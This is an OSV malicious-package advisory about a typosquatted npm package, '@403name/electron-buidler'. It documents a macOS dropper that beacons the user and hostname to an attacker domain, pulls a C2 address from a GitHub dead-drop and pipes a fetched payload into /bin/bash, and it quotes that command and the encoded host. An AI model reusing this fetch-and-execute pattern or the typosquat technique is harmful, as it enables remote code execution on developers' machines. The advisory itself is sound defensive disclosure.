MAL-2026-5547

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@403name/electron-buidler/MAL-2026-5547.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5547
Published
2026-06-11T03:15:04Z
Modified
2026-06-11T04:01:30.623101675Z
Summary
Malicious code in @403name/electron-buidler (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (6ed72e6dbbdb78cd8fc99bfafc15900f16543690460ae2cfad826aeee20c05a4)

On require(), index.js executes an immediately-invoked function that platform-gates to macOS, skips CI environments, drops a one-shot marker file in ~/.cache/.nyx-npm/eb, then after a 30-90 second random delay performs two attacker-controlled network operations. First, it issues a curl GET to https://k7xm9q.xyz/api/clickfix-callback carrying a beacon ID, $USER, os.hostname(), and the literal tag 'npm_electron-buidler' as query parameters, identifying the victim to the attacker. Second, it fetches a dead-drop file at https://raw.githubusercontent.com/nyx-deploy/config/main/c2.txt to learn a C2 base (base64-encoded fallback decodes to https://k7xm9q.xyz), then pipes curl -sSfL <C2>/api/payload/ | /bin/bash via spawn('/bin/sh','-c',...) with & disown to detach the shell. The C2 host is concealed via atob('aHR0cHM6Ly9rN3htOXEueHl6'). The package name '@403name/electron-buidler' is a one-character typo of the popular 'electron-builder' package under an unrelated scope; the README's 'Electron application builder' claim is a cover for the dropper. Importing this package on a non-CI macOS host yields full remote code execution as the installing user with attacker-controlled payload delivery and no consent.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005449",
            "versions": [
                "1.0.1"
            ],
            "sha256": "6ed72e6dbbdb78cd8fc99bfafc15900f16543690460ae2cfad826aeee20c05a4",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T03:15:04Z",
            "import_time": "2026-06-11T03:48:52.767083914Z"
        },
        {
            "id": "IN-MAL-2026-005452",
            "versions": [
                "1.0.0"
            ],
            "sha256": "bf81a596bee9d4858a18bd26f5037bfdab52f11400c3590dc8b99b6e3e1daa53",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T03:15:24Z",
            "import_time": "2026-06-11T03:48:53.123610268Z"
        }
    ]
}

Affected packages

npm / @403name/electron-buidler

Package

Name
@403name/electron-buidler
Purl
pkg:npm/%40403name%2Felectron-buidler

Affected ranges

Affected versions

1.*
1.0.0
1.0.1

Database specific

cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "index.js",
            "sha256": "610475c54a6f7c8a3ca10f849b6fd413f5a50c32d691f4d88db846dc439ee035",
            "tlsh": "5da144cd7be73230272311a6da2f980e65be8912154ed918741c93ce1fe07a0926ddfd"
        },
        {
            "path": "package.json",
            "sha256": "ace6a81005f9598641133284dd34ee69c1dc97289ef3303cc87408077dd1d29f",
            "tlsh": "da012871dd205d7307cc1a519e670d48e1764c1f8c9cbc1833e2821c476e4bb21be65e"
        }
    ],
    "package_integrity": [
        {
            "filename": "electron-buidler-1.0.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-M7/NtNOvNpPl4dzY1vfETFOVl5Yaih1W/HzVBHFzpLjb1A9lbEeqBk8FNW/f8mxkIkMDabmAmfH/EyvytMcf9Q==",
                "sha1": "416b573a7170e0a4686d544b9cd229e8b6b9fef3"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@403name/electron-buidler/MAL-2026-5547.json"